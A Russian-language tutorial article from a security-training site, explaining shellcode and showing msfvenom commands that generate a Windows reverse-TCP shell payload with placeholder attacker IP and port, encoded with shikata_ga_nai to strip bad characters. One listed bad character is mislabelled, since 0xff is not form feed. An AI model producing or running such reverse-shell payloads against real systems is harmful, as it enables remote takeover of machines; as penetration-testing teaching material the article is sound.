• Курсы Академии Кодебай, стартующие в мае - июне, от команды The Codeby

    1. Цифровая криминалистика и реагирование на инциденты
    2. ОС Linux (DFIR) Старт: 16 мая
    3. Анализ фишинговых атак Старт: 16 мая Устройства для тестирования на проникновение Старт: 16 мая

    Скидки до 10%

    Полный список ближайших курсов ...

Гостевая статья Создание кода Shellcode с помощью msfvenom

Создание кода Shellcode с помощью msfvenom.png



Msfvenom - это комбинация msfpayload и msfencode, помещающая оба эти инструмента в один экземпляр Framework.

Что такое shellcode?

При взломе shellcode - это небольшой фрагмент кода, используемый в качестве полезной нагрузки при использовании программной уязвимости. Он называется "shellcode", поскольку обычно запускает командную оболочку, из которой злоумышленник может управлять скомпрометированной машиной, но любой фрагмент кода, выполняющий аналогичную задачу, можно назвать shellcode.

Вы можете написать свой собственный shellcode и вы можете использовать некоторые инструменты, чтобы создать их для вас, msfvenom является одним из таких инструментов, с помощью которого вы можете создать shellcode.

Команда:
[B]msfvenom -h[/B]

В данном учебном пособии мы выбрали windows/shell_reverse_tcp полезной нагрузки для создания шелл-кода оболочки,

Команда:
Код:
msfvenom -p windows/shell_reverse_tcp LHOST= yourip LPORT=listeningport -f c

Вы увидите, что ваш шелл-код генерируется msfvenom, следующим шагом будет удаление плохих символов, так что наш шелл-код выполняется так, как мы хотим, плохие символы являются простыми символами, которые в основном завершают наш код, прежде чем он будет полностью исполнен.

Распространенные недопустимые символы:
0x00 ПУСТОЙ УКАЗАТЕЛЬ (\0)
0x09 Вкладка (\t)
0x0a Канал линии (\n)
0x0d Возврат каретки (\r)
0xff Канал формы (\f)

Чтобы удалить неправильные символы, мы должны кодировать их с помощью какого-то кодировщика, в этом учебном пособии мы использовали shikata_gai_nai кодировщик.

Команда:
Код:
msfvenom -p windows/shell_reverse_tcp LHOST=yourip LPORT=listeningport -f c  -e x86/shikata_ga_nai -b “\x00”


Руководство
—————
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!